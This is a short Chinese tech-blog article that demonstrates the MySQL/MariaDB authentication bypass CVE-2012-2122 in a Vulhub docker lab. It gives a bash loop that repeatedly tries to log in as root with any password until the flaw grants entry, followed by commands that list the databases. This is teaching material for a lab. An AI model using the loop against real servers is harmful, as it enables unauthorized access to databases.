热门标签
热门文章
- 1Mac 上安装 MySQL 8 步骤_mysql8 mac安装
- 2微信小程序 web-view 访问外部链接_小程序打开外部链接
- 3智密腾讯云直播组件--准备开发环境_腾讯云直播im
- 4基于Neo4j将知识图谱用于检索增强生成:Knowledge Graphs for RAG_neo4j knowledge-graph-ragapplication
- 5毕业设计:python哔哩哔哩弹幕数据分析可视化系统 B站 bilibili 弹幕 Django框架(源码)✅_爬取视频弹幕可视化
- 6【AICFD教程】汽车外气动仿真,小白学CFD的入门案例
- 7工作10年,30+转行软件测试,月薪10.5K_工作10年去培训测试工程师
- 8python也能画架构图
- 9linux python htmlparser 安装,python pycparser安装程序
- 10【数据湖与数据仓库】数据湖与数据仓库的区别与应用
当前位置: article > 正文
MySQL 身份认证漏洞 CVE-2012-2122
作者:酷酷是懒虫 | 2024-08-16 08:31:36
赞
踩
cve-2012-2122
漏洞影响版本
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
- 1
- 2
- 3
演示
开启靶场
进入漏洞目录
cd /root/vulhub/mysql/CVE-2012-2122
- 1
开启漏洞靶场
docker-compose up -d
- 1
攻击
直接 运行 这个命令
for i in `seq 1 100`;do mysql -uroot -p11111 -h 192.168.61.128 -P3306;done
for i in `seq 1 1000`;do mysql -u(账号不用正确) -p(密码不用正确) -h(MySQLIP地址) -P3306;done
- 1
- 2
- 3
这个命令的意思就是:for语句调用终端去连接MySQL,如果存在这个漏洞,他就会不断的去尝试进入 MySQL 数据库中
显示数据库
show databases;
- 1
显示数据库版本
select version();
- 1
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/酷酷是懒虫/article/detail/987378
推荐阅读
相关标签
